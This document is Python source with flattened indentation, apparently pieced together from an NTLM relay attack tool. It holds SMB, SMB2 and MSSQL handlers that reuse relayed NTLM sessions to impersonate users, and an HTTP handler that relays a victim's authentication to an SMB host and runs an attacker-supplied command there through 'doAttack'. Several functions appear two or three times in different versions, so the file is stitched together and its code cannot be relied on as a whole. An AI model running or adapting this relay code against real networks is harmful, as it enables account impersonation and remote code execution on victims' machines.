elif unpack('B', securityBlob[0])[0] == ASN1_SUPPORTED_MECH:
# AUTH packet
blob = SPNEGO_NegTokenResp(securityBlob)
token = blob['ResponseToken']
else:
# No GSSAPI stuff, raw NTLMSSP
rawNTLM = True
token = securityBlob
# NEGOTIATE_MESSAGE
# First of all, we should received a type 1 message. Let's answer it
challengeMessage = self.sessionData['CHALLENGE_MESSAGE']
challengeMessage['flags'] &= ~(NTLMSSP_NEGOTIATE_SIGN)
if rawNTLM is False:
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = '\x01'
respToken['SupportedMech'] = TypesMech[
'NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
else:
respToken = challengeMessage
resp = SMB2Packet()
resp['Flags'] = SMB2_FLAGS_SERVER_TO_REDIR
resp['Status'] = STATUS_MORE_PROCESSING_REQUIRED
resp['CreditRequestResponse'] = 1
resp['CreditCharge'] = recvPacket['CreditCharge']
resp['Command'] = recvPacket['Command']
resp['SessionID'] = 0
resp['Reserved'] = recvPacket['Reserved']
resp['MessageID'] = recvPacket['MessageID']
resp['TreeID'] = recvPacket['TreeID']
respSMBCommand['SecurityBufferOffset'] = 0x48
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken.getData()
resp['Data'] = respSMBCommand
self.__NBSession.send_packet(resp.getData())
recvPacket, smbCommand = self.getSMBPacket()
sessionSetupData = SMB2SessionSetup(recvPacket['Data'])
securityBlob = sessionSetupData['Buffer']
blob = SPNEGO_NegTokenResp(securityBlob)
token = blob['ResponseToken']
# AUTHENTICATE_MESSAGE, here we deal with authentication
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
try:
username = (
'%s/%s' %
(authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))
).upper()
except UnicodeDecodeError:
# Not Unicode encoded?
username = ('%s/%s' %
(authenticateMessage['domain_name'],
authenticateMessage['user_name'])).upper()
respToken = SPNEGO_NegTokenResp()
# Check if we have a connection for the user
if self.activeRelays.has_key(username):
LOG.info('SOCKS: Proxying client session for %s@%s(445)' %
(username, self.targetHost))
errorCode = STATUS_SUCCESS
smbClient = self.activeRelays[username][
'protocolClient'].session
uid = smbClient.getSMBServer()._Session['SessionID']
else:
LOG.error('SOCKS: No session for %s@%s(445) available' %
(username, self.targetHost))
errorCode = STATUS_ACCESS_DENIED
uid = 0
smbClient = None
# accept-completed
respToken['NegResult'] = '\x00'
resp = SMB2Packet()
resp['Flags'] = SMB2_FLAGS_SERVER_TO_REDIR
resp['Status'] = errorCode
resp['CreditRequestResponse'] = 1
resp['CreditCharge'] = recvPacket['CreditCharge']
resp['Command'] = recvPacket['Command']
resp['SessionID'] = uid
resp['Reserved'] = recvPacket['Reserved']
resp['MessageID'] = recvPacket['MessageID']
resp['TreeID'] = recvPacket['TreeID']
respSMBCommand['SecurityBufferOffset'] = 0x48
# This is important for SAMBA client to work. If it is not set as a guest session,
# SAMBA will *not* like the fact that the packets are not signed (even tho it was not enforced).
respSMBCommand['SessionFlags'] = SMB2_SESSION_FLAG_IS_GUEST
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken.getData()
resp['Data'] = respSMBCommand
self.__NBSession.send_packet(resp.getData())
return smbClient, username
def skipAuthentication(self):
# 1. First packet should be a TDS_PRELOGIN()
tds = self.recvTDS()
if tds['Type'] != TDS_PRE_LOGIN:
# Unexpected packet
LOG.debug('Unexpected packet type %d instead of TDS_PRE_LOGIN' %
tds['Type'])
return False
prelogin = TDS_PRELOGIN()
prelogin['Version'] = "\x08\x00\x01\x55\x00\x00"
prelogin['Encryption'] = TDS_ENCRYPT_NOT_SUP
prelogin['ThreadID'] = struct.pack('<L', random.randint(0, 65535))
prelogin['Instance'] = '\x00'
# Answering who we are
self.sendTDS(TDS_TABULAR, str(prelogin), 0)
# 2. Packet should be a TDS_LOGIN
tds = self.recvTDS()
if tds['Type'] != TDS_LOGIN7:
# Unexpected packet
LOG.debug('Unexpected packet type %d instead of TDS_LOGIN' %
tds['Type'])
return False
login = TDS_LOGIN()
login.fromString(tds['Data'])
if login['OptionFlags2'] & TDS_INTEGRATED_SECURITY_ON:
# Windows Authentication enabled
# Send the resp we've got from the original relay
TDSResponse = self.sessionData['NTLM_CHALLENGE']
self.sendTDS(TDSResponse['Type'], TDSResponse['Data'], 0)
# Here we should get the NTLM_AUTHENTICATE
tds = self.recvTDS()
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(tds['Data'])
self.username = authenticateMessage['user_name']
try:
self.username = (
'%s/%s' %
(authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))
).upper()
except UnicodeDecodeError:
# Not Unicode encoded?
self.username = ('%s/%s' %
(authenticateMessage['domain_name'],
authenticateMessage['user_name'])).upper()
else:
if login['UserName'].find('/') >= 0:
try:
self.username = login['UserName'].upper().decode(
'utf-16le')
except UnicodeDecodeError:
# Not Unicode encoded?
self.username = login['UserName'].upper()
else:
try:
self.username = (
'/%s' % login['UserName'].decode('utf-16le')).upper()
except UnicodeDecodeError:
# Not Unicode encoded?
self.username = ('/%s' % login['UserName']).upper()
# Check if we have a connection for the user
if self.activeRelays.has_key(self.username):
# Check the connection is not inUse
if self.activeRelays[self.username]['inUse'] is True:
LOG.error(
'MSSQL: Connection for %s@%s(%s) is being used at the moment!'
% (self.username, self.targetHost, self.targetPort))
return False
else:
LOG.info('MSSQL: Proxying client session for %s@%s(%s)' %
(self.username, self.targetHost, self.targetPort))
self.session = self.activeRelays[
self.username]['protocolClient'].session
else:
LOG.error('MSSQL: No session for %s@%s(%s) available' %
(self.username, self.targetHost, self.targetPort))
return False
# We have a session relayed, let's answer back with the data
if login['OptionFlags2'] & TDS_INTEGRATED_SECURITY_ON:
TDSResponse = self.sessionData['AUTH_ANSWER']
self.sendTDS(TDSResponse['Type'], TDSResponse['Data'], 0)
else:
TDSResponse = self.sessionData['AUTH_ANSWER']
self.sendTDS(TDSResponse['Type'], TDSResponse['Data'], 0)
return True
def skipAuthentication(self):
# 1. First packet should be a TDS_PRELOGIN()
tds = self.recvTDS()
if tds['Type'] != TDS_PRE_LOGIN:
# Unexpected packet
LOG.debug('Unexpected packet type %d instead of TDS_PRE_LOGIN' % tds['Type'])
return False
prelogin = TDS_PRELOGIN()
prelogin['Version'] = "\x08\x00\x01\x55\x00\x00"
prelogin['Encryption'] = TDS_ENCRYPT_NOT_SUP
prelogin['ThreadID'] = struct.pack('<L',random.randint(0,65535))
prelogin['Instance'] = '\x00'
# Answering who we are
self.sendTDS(TDS_TABULAR, str(prelogin), 0)
# 2. Packet should be a TDS_LOGIN
tds = self.recvTDS()
if tds['Type'] != TDS_LOGIN7:
# Unexpected packet
LOG.debug('Unexpected packet type %d instead of TDS_LOGIN' % tds['Type'])
return False
login = TDS_LOGIN()
login.fromString(tds['Data'])
if login['OptionFlags2'] & TDS_INTEGRATED_SECURITY_ON:
# Windows Authentication enabled
# Send the resp we've got from the original relay
TDSResponse = self.sessionData['NTLM_CHALLENGE']
self.sendTDS(TDSResponse['Type'], TDSResponse['Data'], 0)
# Here we should get the NTLM_AUTHENTICATE
tds = self.recvTDS()
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(tds['Data'])
self.username = authenticateMessage['user_name']
try:
self.username = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper()
except UnicodeDecodeError:
# Not Unicode encoded?
self.username = ('%s/%s' % (authenticateMessage['domain_name'], authenticateMessage['user_name'])).upper()
else:
if login['UserName'].find('/') >=0:
try:
self.username = login['UserName'].upper().decode('utf-16le')
except UnicodeDecodeError:
# Not Unicode encoded?
self.username = login['UserName'].upper()
else:
try:
self.username = ('/%s' % login['UserName'].decode('utf-16le')).upper()
except UnicodeDecodeError:
# Not Unicode encoded?
self.username = ('/%s' % login['UserName']).upper()
# Check if we have a connection for the user
if self.activeRelays.has_key(self.username):
# Check the connection is not inUse
if self.activeRelays[self.username]['inUse'] is True:
LOG.error('MSSQL: Connection for %s@%s(%s) is being used at the moment!' % (
self.username, self.targetHost, self.targetPort))
return False
else:
LOG.info('MSSQL: Proxying client session for %s@%s(%s)' % (
self.username, self.targetHost, self.targetPort))
self.session = self.activeRelays[self.username]['protocolClient'].session
else:
LOG.error('MSSQL: No session for %s@%s(%s) available' % (
self.username, self.targetHost, self.targetPort))
return False
# We have a session relayed, let's answer back with the data
if login['OptionFlags2'] & TDS_INTEGRATED_SECURITY_ON:
TDSResponse = self.sessionData['AUTH_ANSWER']
self.sendTDS(TDSResponse['Type'], TDSResponse['Data'], 0)
else:
TDSResponse = self.sessionData['AUTH_ANSWER']
self.sendTDS(TDSResponse['Type'], TDSResponse['Data'], 0)
return True
def processSessionSetup(self, recvPacket):
if self.isSMB2 is False:
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
smbCommand = SMBCommand(recvPacket['Data'][0])
if smbCommand['WordCount'] == 12:
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
# First of all, we should received a type 1 message. Let's answer it
# NEGOTIATE_MESSAGE
challengeMessage = self.sessionData['CHALLENGE_MESSAGE']
challengeMessage['flags'] &= ~(NTLMSSP_NEGOTIATE_SIGN)
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = '\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = str(challengeMessage)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
respData['NativeOS'] = ''
respData['NativeLanMan'] = ''
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp = NewSMBPacket()
resp['Flags1'] = SMB.FLAGS1_REPLY
resp['Flags2'] = SMB.FLAGS2_NT_STATUS
resp['Pid'] = recvPacket['Pid']
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Uid'] = 0
errorCode = STATUS_MORE_PROCESSING_REQUIRED
resp['ErrorCode'] = errorCode >> 16
resp['ErrorClass'] = errorCode & 0xff
resp.addCommand(respSMBCommand)
self.__NBSession.send_packet(resp.getData())
recvPacket, smbCommand = self.getSMBPacket()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
if unpack('B', sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Now we should've received a type 3 message
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
try:
username = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper()
except UnicodeDecodeError:
# Not Unicode encoded?
username = ('%s/%s' % (authenticateMessage['domain_name'], authenticateMessage['user_name'])).upper()
# Check if we have a connection for the user
if self.activeRelays.has_key(username):
LOG.info('SOCKS: Proxying client session for %s@%s(445)' % (username, self.targetHost))
errorCode = STATUS_SUCCESS
smbClient = self.activeRelays[username]['protocolClient'].session
uid = smbClient.getSMBServer().get_uid()
else:
LOG.error('SOCKS: No session for %s@%s(445) available' % (username, self.targetHost))
errorCode = STATUS_ACCESS_DENIED
uid = 0
smbClient = None
resp = NewSMBPacket()
resp['Flags1'] = recvPacket['Flags1'] | SMB.FLAGS1_REPLY
resp['Flags2'] = recvPacket['Flags2'] | SMB.FLAGS2_EXTENDED_SECURITY
resp['Command'] = recvPacket['Command']
resp['Pid'] = recvPacket['Pid']
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Uid'] = uid
resp['ErrorCode'] = errorCode >> 16
resp['ErrorClass'] = errorCode & 0xff
respData['NativeOS'] = ''
respData['NativeLanMan'] = ''
if uid == 0:
resp['Data'] = '\x00\x00\x00'
smbClient = None
else:
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = '\x00'
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp.addCommand(respSMBCommand)
self.__NBSession.send_packet(resp.getData())
return smbClient, username
else:
LOG.error('SOCKS: Can\'t handle standard security at the moment!')
return None
else:
respSMBCommand = SMB2SessionSetup_Response()
sessionSetupData = SMB2SessionSetup(recvPacket['Data'])
securityBlob = sessionSetupData['Buffer']
rawNTLM = False
if unpack('B', securityBlob[0])[0] == ASN1_AID:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(securityBlob)
token = blob['MechToken']
if len(blob['MechTypes'][0]) > 0:
# Is this GSSAPI NTLM or something else we don't support?
mechType = blob['MechTypes'][0]
if mechType != TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']:
# Nope, do we know it?
if MechTypes.has_key(mechType):
mechStr = MechTypes[mechType]
else:
mechStr = hexlify(mechType)
LOG.debug("Unsupported MechType '%s', we just want NTLMSSP, answering" % mechStr)
# We don't know the token, we answer back again saying
# we just support NTLM.
# ToDo: Build this into a SPNEGO_NegTokenResp()
respToken = '\xa1\x15\x30\x13\xa0\x03\x0a\x01\x03\xa1\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a'
respSMBCommand['SecurityBufferOffset'] = 0x48
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken
resp = SMB2Packet()
resp['Flags'] = SMB2_FLAGS_SERVER_TO_REDIR
resp['Status'] = STATUS_SUCCESS
resp['CreditRequestResponse'] = 1
resp['CreditCharge'] = recvPacket['CreditCharge']
resp['Command'] = recvPacket['Command']
resp['SessionID'] = 0
resp['Reserved'] = recvPacket['Reserved']
resp['MessageID'] = recvPacket['MessageID']
resp['TreeID'] = recvPacket['TreeID']
resp['Data'] = respSMBCommand
self.__NBSession.send_packet(resp.getData())
recvPacket, smbCommand = self.getSMBPacket()
return self.processSessionSetup(recvPacket)
elif unpack('B', securityBlob[0])[0] == ASN1_SUPPORTED_MECH:
# AUTH packet
blob = SPNEGO_NegTokenResp(securityBlob)
token = blob['ResponseToken']
else:
# No GSSAPI stuff, raw NTLMSSP
rawNTLM = True
token = securityBlob
# NEGOTIATE_MESSAGE
# First of all, we should received a type 1 message. Let's answer it
challengeMessage = self.sessionData['CHALLENGE_MESSAGE']
challengeMessage['flags'] &= ~(NTLMSSP_NEGOTIATE_SIGN)
if rawNTLM is False:
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = '\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
else:
respToken = challengeMessage
resp = SMB2Packet()
resp['Flags'] = SMB2_FLAGS_SERVER_TO_REDIR
resp['Status'] = STATUS_MORE_PROCESSING_REQUIRED
resp['CreditRequestResponse'] = 1
resp['CreditCharge'] = recvPacket['CreditCharge']
resp['Command'] = recvPacket['Command']
resp['SessionID'] = 0
resp['Reserved'] = recvPacket['Reserved']
resp['MessageID'] = recvPacket['MessageID']
resp['TreeID'] = recvPacket['TreeID']
respSMBCommand['SecurityBufferOffset'] = 0x48
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken.getData()
resp['Data'] = respSMBCommand
self.__NBSession.send_packet(resp.getData())
recvPacket, smbCommand = self.getSMBPacket()
sessionSetupData = SMB2SessionSetup(recvPacket['Data'])
securityBlob = sessionSetupData['Buffer']
blob = SPNEGO_NegTokenResp(securityBlob)
token = blob['ResponseToken']
# AUTHENTICATE_MESSAGE, here we deal with authentication
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
try:
username = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper()
except UnicodeDecodeError:
# Not Unicode encoded?
username = ('%s/%s' % (authenticateMessage['domain_name'], authenticateMessage['user_name'])).upper()
respToken = SPNEGO_NegTokenResp()
# Check if we have a connection for the user
if self.activeRelays.has_key(username):
LOG.info('SOCKS: Proxying client session for %s@%s(445)' % (username, self.targetHost))
errorCode = STATUS_SUCCESS
smbClient = self.activeRelays[username]['protocolClient'].session
uid = smbClient.getSMBServer()._Session['SessionID']
else:
LOG.error('SOCKS: No session for %s@%s(445) available' % (username, self.targetHost))
errorCode = STATUS_ACCESS_DENIED
uid = 0
smbClient = None
# accept-completed
respToken['NegResult'] = '\x00'
resp = SMB2Packet()
resp['Flags'] = SMB2_FLAGS_SERVER_TO_REDIR
resp['Status'] = errorCode
resp['CreditRequestResponse'] = 1
resp['CreditCharge'] = recvPacket['CreditCharge']
resp['Command'] = recvPacket['Command']
resp['SessionID'] = uid
resp['Reserved'] = recvPacket['Reserved']
resp['MessageID'] = recvPacket['MessageID']
resp['TreeID'] = recvPacket['TreeID']
respSMBCommand['SecurityBufferOffset'] = 0x48
# This is important for SAMBA client to work. If it is not set as a guest session,
# SAMBA will *not* like the fact that the packets are not signed (even tho it was not enforced).
respSMBCommand['SessionFlags'] = SMB2_SESSION_FLAG_IS_GUEST
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken.getData()
resp['Data'] = respSMBCommand
self.__NBSession.send_packet(resp.getData())
return smbClient, username
def processSessionSetup(self, recvPacket):
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
smbCommand = SMBCommand(recvPacket['Data'][0])
if smbCommand['WordCount'] == 12:
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
# First of all, we should received a type 1 message. Let's answer it
# NEGOTIATE_MESSAGE
challengeMessage = self.smbData['CHALLENGE_MESSAGE']
challengeMessage['flags'] &= ~(NTLMSSP_NEGOTIATE_SIGN)
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = '\x01'
respToken['SupportedMech'] = TypesMech[
'NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = str(challengeMessage)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters[
'SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
respData['NativeOS'] = ''
respData['NativeLanMan'] = ''
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp = NewSMBPacket()
resp['Flags1'] = SMB.FLAGS1_REPLY
resp['Flags2'] = SMB.FLAGS2_NT_STATUS
resp['Pid'] = recvPacket['Pid']
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Uid'] = 0
errorCode = STATUS_MORE_PROCESSING_REQUIRED
resp['ErrorCode'] = errorCode >> 16
resp['ErrorClass'] = errorCode & 0xff
resp.addCommand(respSMBCommand)
self.__NBSession.send_packet(resp.getData())
recvPacket, smbCommand = self.getSMBPacket()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(
smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters[
'SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
if unpack('B', sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Now we should've received a type 3 message
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
# Check if we have a connection for the user
if self.activeRelays.has_key(authenticateMessage['user_name']):
LOG.info('SOCKS: Proxying client session for %s@%s(445)' %
(authenticateMessage['user_name'].decode('utf-16le'),
self.targetHost))
errorCode = STATUS_SUCCESS
smbClient = self.activeRelays[
authenticateMessage['user_name']]['client']
uid = smbClient.get_uid()
else:
LOG.error('SOCKS: No session for %s@%s(445) available' %
(authenticateMessage['user_name'].decode('utf-16le'),
self.targetHost))
errorCode = STATUS_ACCESS_DENIED
uid = 0
resp = NewSMBPacket()
resp['Flags1'] = recvPacket['Flags1'] | SMB.FLAGS1_REPLY
resp[
'Flags2'] = recvPacket['Flags2'] | SMB.FLAGS2_EXTENDED_SECURITY
resp['Command'] = recvPacket['Command']
resp['Pid'] = recvPacket['Pid']
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Uid'] = uid
resp['ErrorCode'] = errorCode >> 16
resp['ErrorClass'] = errorCode & 0xff
respData['NativeOS'] = ''
respData['NativeLanMan'] = ''
if uid == 0:
resp['Data'] = '\x00\x00\x00'
smbClient = None
else:
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = '\x00'
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters[
'SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp.addCommand(respSMBCommand)
self.__NBSession.send_packet(resp.getData())
return smbClient, authenticateMessage['user_name']
else:
LOG.error('SOCKS: Can\'t handle standard security at the moment!')
return None
class HTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(
self, request, client_address, server)
def handle_one_request(self):
try:
SimpleHTTPServer.SimpleHTTPRequestHandler.handle_one_request(
self)
except:
pass
def log_message(self, format, *args):
return
def do_AUTHHEAD(self, message=''):
self.send_response(401)
self.send_header('WWW-Authenticate', message)
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length', '0')
self.end_headers()
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self.send_response(200)
def do_OPTIONS(self):
messageType = 0
if self.headers.getheader('Authorization') is None:
self.do_AUTHHEAD(message='NTLM')
pass
else:
# constants.isRunning = True
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = unpack(
'<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00') + 4])[0]
if messageType == 1:
self.target = self.client_address[0]
try:
self.client = SMBClient(self.target,
extended_security=True)
self.client.set_timeout(60)
except Exception, e:
print "Connection against target %s FAILED" % self.target
print str(e)
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message='NTLM ' +
base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = str(token)
clientResponse, errorCode = self.client.sendAuth(
self.challengeMessage['challenge'], respToken2.getData())
if errorCode != STATUS_SUCCESS:
# print "[-] Authenticating against %s FAILED" % self.target
self.do_AUTHHEAD('NTLM')
constants.authentication_succeed = False
else:
# print "[+] Authentication SUCCEED"
constants.authentication_succeed = True
executeCmd = doAttack(self.client, self.server.command)
constants.outputCmd = executeCmd.run()
constants.smb_client = self.client
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length', '0')
self.end_headers()
self.server.server_close()
self.server.shutdown()
